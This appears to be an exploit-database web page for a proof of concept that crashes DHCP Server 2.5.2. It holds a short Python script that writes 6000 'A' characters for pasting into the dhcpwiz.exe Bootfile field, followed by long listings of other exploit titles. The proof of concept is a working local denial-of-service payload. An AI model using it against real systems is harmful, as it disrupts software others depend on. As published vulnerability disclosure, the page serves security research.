Menu

Search for hundreds of thousands of exploits

"DHCP Server 2.5.2 - Denial of Service (PoC)"

Author

Exploit author

"Victor Mondragón"

Platform

Exploit platform

windows

Release date

Exploit published date

2019-04-17

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#Exploit Title: DHCP Server 2.5.2 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-04-16
#Vendor Homepage: http://www.dhcpserver.de/cms/
#Software Link: http://www.dhcpserver.de/cms/wp-content/plugins/download-attachments
#Tested Version: 2.5.2
#Tested on: Windows 7 x32 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: DHCPSRV_2.5.2.py
#2.- Open dhcp.txt and copy content to clipboard
#2.- Open dhcpwiz.exe 
#3.- Click Next
#4.- In Network Interface cards Select "Local Area Connection" and click on Next 
#5.- In Supported Protocols click on Next 
#6.- In Configuring DHCP for Interface Select "DHCP Options"
#7.- Select "Bootfile" field and Paste ClipBoard
#8.- Crashed

cod = "\x41" * 6000
f = open('dhcp.txt', 'w')
f.write(cod)
f.close()
Release DateTitleTypePlatformAuthor
2020-02-20"Core FTP Lite 1.3 - Denial of Service (PoC)"doswindows"berat isler"
2020-02-20"Easy2Pilot 7 - Cross-Site Request Forgery (Add User)"webappsphpindoushka
2020-02-19"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak"webappshardwarebyteGoblin
2020-02-19"Virtual Freer 1.58 - Remote Command Execution"webappsphpSajjadBnd
2020-02-19"DBPower C300 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-18"WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting"webappsphp"Ultra Security Team"
2020-02-17"SOPlanning 1.45 - 'by' SQL Injection"webappsphpJ3rryBl4nks
2020-02-17"Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-02-17"Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)"webappsphpJ3rryBl4nks
2020-02-17"SOPlanning 1.45 - 'users' SQL Injection"webappsphpJ3rryBl4nks
2020-02-17"Anviz CrossChex - Buffer Overflow (Metasploit)"remotewindowsMetasploit
2020-02-17"Avaya Aura Communication Manager 5.2 - Remote Code Execution"webappshardware"Sarang Tumne"
2020-02-17"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)"webappsphpJ3rryBl4nks
2020-02-17"WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting"webappsphp"Ashkan Moghaddas"
2020-02-17"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation"localwindowsnu11secur1ty
2020-02-17"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"LabVantage 8.3 - Information Disclosure"webappsjava"Joel Aviad Ossi"
2020-02-17"Cuckoo Clock v5.0 - Buffer Overflow"localwindowsboku
2020-02-17"HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-17"BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path"localwindowsboku
2020-02-14"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection"webappsphpJ3rryBl4nks
2020-02-14"SprintWork 2.3.1 - Local Privilege Escalation"localwindowsboku
2020-02-14"HomeGuard Pro 9.3.1 - Insecure Folder Permissions"localwindowsboku
2020-02-14"EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-13"Wordpress Plugin tutor.1.5.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"PANDORAFMS 7.0 - Authenticated Remote Code Execution"webappsphp"Engin Demirbilek"
2020-02-13"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"OpenTFTP 1.66 - Local Privilege Escalation"localwindowsboku
2020-02-13"Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting"webappsphp"Mehran Feizi"
Release DateTitleTypePlatformAuthor
2020-02-20"Core FTP Lite 1.3 - Denial of Service (PoC)"doswindows"berat isler"
2020-02-17"HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-17"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation"localwindowsnu11secur1ty
2020-02-17"Cuckoo Clock v5.0 - Buffer Overflow"localwindowsboku
2020-02-17"BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path"localwindowsboku
2020-02-17"Anviz CrossChex - Buffer Overflow (Metasploit)"remotewindowsMetasploit
2020-02-14"SprintWork 2.3.1 - Local Privilege Escalation"localwindowsboku
2020-02-14"EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-14"HomeGuard Pro 9.3.1 - Insecure Folder Permissions"localwindowsboku
2020-02-13"OpenTFTP 1.66 - Local Privilege Escalation"localwindowsboku
2020-02-12"MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow"localwindowsZwX
2020-02-12"MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow"localwindowsZwX
2020-02-12"MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow"localwindowsZwX
2020-02-12"HP System Event Utility - Local Privilege Escalation"localwindowshyp3rlinx
2020-02-11"freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path"localwindowsboku
2020-02-11"Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow"localwindowsZwX
2020-02-11"Disk Savvy Enterprise 12.3.18 - Unquoted Service Path"localwindowsboku
2020-02-11"Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path"localwindowsboku
2020-02-11"DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow"localwindowsZwX
2020-02-11"FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path"localwindowsboku
2020-02-11"Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path"localwindowsboku
2020-02-11"DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow"localwindowsZwX
2020-02-11"Torrent iPod Video Converter 1.51 - Stack Overflow"localwindowsboku
2020-02-10"Dota 2 7.23f - Denial of Service (PoC)"doswindows"Bogdan Kurinnoy"
2020-02-10"Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow"localwindowsZwX
2020-02-10"Ricoh Driver - Privilege Escalation (Metasploit)"localwindowsMetasploit
2020-02-07"Windscribe - WindscribeService Named Pipe Privilege Escalation (Metasploit)"localwindowsMetasploit
2020-02-06"AbsoluteTelnet 11.12 - 'license name' Denial of Service (PoC)"doswindowschuyreds
Release DateTitleTypePlatformAuthor
2019-05-24"Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-24"Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-24"Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-24"Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-24"Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-22"RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-22"RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-22"TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-22"TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-21"Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-21"Deluge 1.3.15 - 'URL' Denial of Service (PoC)"dosmultiple"Victor Mondragón"
2019-05-20"BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-20"BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-20"AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-16"Axessh 4.2 - 'Log file name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-16"ZOC Terminal v7.23.4 - 'Private key file' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-16"ZOC Terminal 7.23.4 - 'Script' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-16"ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-13"SpotMSN 2.4.6 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-13"DNSS 2.1.8 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-10"ASPRunner.NET 10.1 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-10"jetCast Server 2.0 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-10"PHPRunner 10.1 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-08"jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-30"SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-26"NSauditor 3.1.2.0 - 'Community' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-26"NSauditor 3.1.2.0 - 'Name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-25"HeidiSQL 10.1.0.5464 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-25"Backup Key Recovery 2.2.4 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-17"DHCP Server 2.5.2 - Denial of Service (PoC)"doswindows"Victor Mondragón"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46721/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse